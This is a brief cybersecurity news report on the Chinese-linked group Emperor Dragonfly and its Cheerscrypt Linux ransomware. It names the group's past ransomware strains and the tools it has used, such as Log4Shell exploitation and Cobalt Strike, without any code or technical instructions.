Chinese cyberespionage operation Emperor Dragonfly, also known as Bronze Starlight and DEV-0401,
has been behind the new Linux-based ransomware strain Cheerscrypt, reports The Hacker News
Cheerscrypt ransomware usage by Emperor Dragonfly comes after it had deployed LockBit 2.0, Atom Silo, Rook, LockFile, NightSky, and Pandora ransomware during the past 12 months, a report from Signia showed.
"Emperor Dragonfly deployed open source tools that were written by Chinese developers for Chinese users. This reinforces claims that the 'Emperor Dragonfly' ransomware operators are based in China," said Signia.
Emperor Dragonfly has targeted VMware Horizon servers by exploiting the Log4Shell flaw to facilitate the distribution of an encrypted Cobalt Strike beacon, which is being deployed alongside a keylogger, the iox internet proxy utility, and the NPS tunneling software, said researchers.
The report also noted that both Cheerscrypt and Emperor Dragonfly shared initial access vectors, encrypted Cobalt Strike beacon delivery, and lateral movement approaches.